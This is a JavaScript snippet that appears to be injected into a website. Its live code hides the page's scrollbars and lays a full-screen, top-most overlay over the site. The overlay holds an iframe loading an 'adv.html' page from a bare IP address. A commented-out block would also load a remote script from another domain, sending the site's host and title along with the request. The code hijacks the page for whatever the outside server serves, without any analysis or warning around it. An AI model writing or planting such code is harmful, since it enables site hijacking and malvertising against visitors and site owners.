// var _site_info_ = {
//   host: document.location.host,
//   title: document.title,
// };
// var _query_params_ = [
//   "d=" + encodeURI(_site_info_.host),
//   "t=" + encodeURI(_site_info_.title),
// ].join("&");
// var adv_script = document.createElement("script");
// adv_script.type = "text/javascript";
// adv_script.src =
//   "https://www.tj181818.com/assets/js/fentch.js?" + _query_params_;
// document.head.appendChild(adv_script);


document.body.style="overflow: hidden !important;";
var stylehiden = document.createElement("style");
stylehiden.innerText = "body{overflow: hidden !important;}";
document.head.appendChild(stylehiden);
var adv_div = document.createElement("div");
var adv_frame = document.createElement("iframe");
adv_frame.src = "http://38.207.40.135/adv.html";
adv_frame.border = 0;
adv_frame.style = "width:100vw;height:100vh;border:none !important;";
adv_div.style = "position:fixed;top:0;bottom:0;left:0;right:0;z-index:288379128;background:#ffffff;";
adv_div.appendChild(adv_frame);
document.body.appendChild(adv_div);